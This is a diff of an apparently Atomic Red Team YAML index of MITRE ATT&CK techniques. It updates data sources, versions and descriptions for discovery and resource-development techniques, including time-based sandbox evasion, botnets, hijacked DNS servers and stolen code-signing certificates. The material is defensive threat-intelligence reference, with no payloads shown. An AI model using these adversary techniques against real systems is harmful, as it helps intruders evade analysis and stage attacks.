x_mitre_platforms: 
@@ -49246,8 +52047,10 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Script: Script Execution' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_version: '1.2' identifier: T1016 atomic_tests: 
@@ -49424,23 +52227,15 @@ discovery: elevation_required: true T1049: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1049 - external_id: T1049 - - source_name: Amazon AWS VPC Guide - url: https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html - description: Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019. - - source_name: Microsoft Azure Virtual Network Overview - url: https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview - description: Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). - What is Azure Virtual Network?. Retrieved October 6, 2019. - - source_name: Google VPC Overview - url: https://cloud.google.com/vpc/docs/vpc - description: Google. (2019, September 23). Virtual Private Cloud (VPC) network - overview. Retrieved October 6, 2019. + created: '2017-05-31T21:30:45.139Z' + modified: '2021-03-08T10:33:01.083Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: System Network Connections Discovery description: "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who 
@@ -49458,36 +52253,43 @@ discovery: can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\"." - name: System Network Connections Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-03-15T14:15:32.910Z' - created: '2017-05-31T21:30:45.139Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Praetorian - x_mitre_version: '2.1' - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1049 + external_id: T1049 + - source_name: Amazon AWS VPC Guide + url: https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html + description: Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019. + - source_name: Microsoft Azure Virtual Network Overview + url: https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview + description: Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). + What is Azure Virtual Network?. Retrieved October 6, 2019. + - source_name: Google VPC Overview + url: https://cloud.google.com/vpc/docs/vpc + description: Google. (2019, September 23). Virtual Private Cloud (VPC) network + overview. Retrieved October 6, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_permissions_required: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '2.2' + x_mitre_contributors: + - Praetorian + x_mitre_is_subtechnique: false identifier: T1049 atomic_tests: - name: System Network Connections Discovery @@ -49621,9 +52423,8 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_version: '1.2' x_mitre_is_subtechnique: false identifier: T1033 
@@ -49709,8 +52510,8 @@ discovery: id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa x_mitre_version: '1.1' x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. 
@@ -49768,7 +52569,9 @@ discovery: description: |- An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) - System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting. + System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) + + This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) external_references: - source_name: mitre-attack external_id: T1124 
@@ -49787,14 +52590,20 @@ discovery: description: Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016. source_name: RSA EU12 They're Inside + - source_name: AnyRun TimeBomb + url: https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/ + description: 'Malicious History. (2020, September 17). Time Bombs: Malware + With Delayed Execution. Retrieved April 22, 2021.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-15T01:07:42.700Z' + modified: '2021-04-22T23:09:24.799Z' created: '2017-05-31T21:31:37.450Z' + x_mitre_contributors: + - FIRST.ORG's Cyber Threat Intelligence SIG x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -49806,10 +52615,10 @@ discovery: information are likely less useful due to how often they may be used by legitimate software. x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - API monitoring - x_mitre_version: '1.1' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '1.2' identifier: T1124 atomic_tests: - name: System Time Discovery 
@@ -49845,25 +52654,13 @@ discovery: name: powershell T1497.003: technique: - created: '2020-03-06T21:11:11.225Z' - modified: '2020-07-01T16:32:02.532Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - description: "Adversaries may employ various time-based methods to detect and - avoid virtualization and analysis environments. This may include timers or - other triggers to avoid a virtual machine environment (VME) or sandbox, specifically - those that are automated or only operate for a limited amount of time.\n\nAdversaries - may employ various time-based evasions, such as delaying malware functionality - upon initial execution using programmatic sleep commands or native system - scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). - Delays may also be based on waiting for specific victim conditions to be met - (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) - to avoid analysis and scrutiny. " + description: |- + Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. + + Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) 
or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. + + Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks) name: Time Based Evasion created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -49872,6 +52669,18 @@ discovery: - source_name: mitre-attack external_id: T1497.003 url: https://attack.mitre.org/techniques/T1497/003 + - source_name: ISACA Malware Tricks + url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes + description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How + Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-01T15:48:28.345Z' + created: '2020-03-06T21:11:11.225Z' x_mitre_platforms: - Linux - macOS @@ -49879,8 +52688,9 @@ discovery: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain 
@@ -49891,7 +52701,7 @@ discovery: being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -49964,8 +52774,9 @@ discovery: other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_data_sources: - - Process command-line parameters - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Deloitte Threat Library Team x_mitre_platforms: @@ -49975,14 +52786,6 @@ discovery: atomic_tests: [] T1497: technique: - created: '2019-04-17T22:22:24.505Z' - modified: '2020-07-01T16:32:02.272Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the @@ -50013,6 +52816,14 @@ discovery: description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-21T15:16:10.835Z' + created: '2019-04-17T22:22:24.505Z' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - Anti-virus 
@@ -50027,8 +52838,9 @@ discovery: - macOS - Linux x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -50057,7 +52869,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Acquire Infrastructure description: |- - Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. + Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. id: attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 
@@ -50065,7 +52877,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T17:59:17.606Z' + modified: '2021-04-15T02:53:19.397Z' created: '2020-09-30T16:37:40.271Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -50105,12 +52917,12 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Botnet - description: 'Before compromising a victim, adversaries may buy, lease, or rent - a network of compromised systems that can be used during targeting. A botnet - is a network of compromised systems that can be instructed to perform coordinated - tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to - use an existing botnet from a booter/stresser service. With a botnet at their - disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + description: 'Adversaries may buy, lease, or rent a network of compromised systems that + can be used during targeting. A botnet is a network of compromised systems + that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) + Adversaries may purchase a subscription to use an existing botnet from a booter/stresser + service. With a botnet at their disposal, adversaries may perform follow-on + activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)' id: attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074 
@@ -50118,7 +52930,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-05T02:15:01.325Z' + modified: '2021-04-15T02:49:14.664Z' created: '2020-10-01T00:49:05.467Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50153,23 +52965,22 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Botnet - description: 'Before compromising a victim, adversaries may compromise numerous - third-party systems to form a botnet that can be used during targeting. A - botnet is a network of compromised systems that can be instructed to perform - coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting - a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), - adversaries may build their own botnet by compromising numerous third-party - systems. Adversaries may also conduct a takeover of an existing botnet, such - as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex - Oct 2015) With a botnet at their disposal, adversaries may perform follow-on - activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + description: 'Adversaries may compromise numerous third-party systems to form + a botnet that can be used during targeting. A botnet is a network of compromised + systems that can be instructed to perform coordinated tasks.(Citation: Norton + Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: + Imperva DDoS for Hire), adversaries may build their own botnet by compromising + numerous third-party systems. Adversaries may also conduct a takeover of an + existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: + Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform + follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).' 
id: attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:03:23.751Z' + modified: '2021-04-15T03:01:00.271Z' created: '2020-10-01T00:58:35.269Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50197,7 +53008,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Code Signing Certificates description: |- - Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations. id: attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf 
@@ -50205,7 +53016,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-15T01:15:54.945Z' + modified: '2021-04-15T03:06:56.855Z' created: '2020-10-01T01:41:08.652Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50218,6 +53029,21 @@ resource-development: atomic_tests: [] T1588.003: technique: + created: '2020-10-01T02:11:47.237Z' + modified: '2021-04-15T03:13:16.259Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15 + description: |- + Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + + Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party. + name: Code Signing Certificates + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1588.003 
@@ -50226,37 +53052,22 @@ resource-development: description: Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. source_name: Wikipedia Code Signing - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Code Signing Certificates - description: |- - Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. - - Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party. - id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T18:22:21.007Z' - created: '2020-10-01T02:11:47.237Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. 
Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1586: technique: id: attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a - description: "Before compromising a victim, adversaries may compromise accounts - with services that can be used during targeting. For operations incorporating - social engineering, the utilization of an online persona may be important. - Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), + description: "Adversaries may compromise accounts with services that can be + used during targeting. For operations incorporating social engineering, the + utilization of an online persona may be important. Rather than creating and + cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for @@ -50287,10 +53098,8 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:05:46.296Z' + modified: '2021-04-15T02:59:07.046Z' created: '2020-10-01T01:17:15.965Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_platforms: - PRE x_mitre_is_subtechnique: false 
@@ -50333,7 +53142,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Compromise Infrastructure description: |- - Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. + Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) id: attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9 
@@ -50341,7 +53150,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:03:23.937Z' + modified: '2021-04-15T03:04:40.423Z' created: '2020-10-01T00:36:30.759Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -50367,7 +53176,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS Server description: |- - Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. + Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019) id: attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81 
@@ -50375,7 +53184,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T00:11:26.376Z' + modified: '2021-04-15T02:49:49.702Z' created: '2020-10-01T00:40:45.279Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50414,7 +53223,7 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 description: |- - Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. + Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) name: DNS Server 
@@ -50423,7 +53232,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T01:22:53.922Z' + modified: '2021-04-15T03:01:54.609Z' created: '2020-10-01T00:54:30.869Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50462,7 +53271,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Develop Capabilities description: |- - Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) + Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability. id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf 
@@ -50470,7 +53279,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:08.552Z' + modified: '2021-04-15T03:08:33.511Z' created: '2020-10-01T01:30:00.877Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50496,23 +53305,23 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). + Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). - Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). 
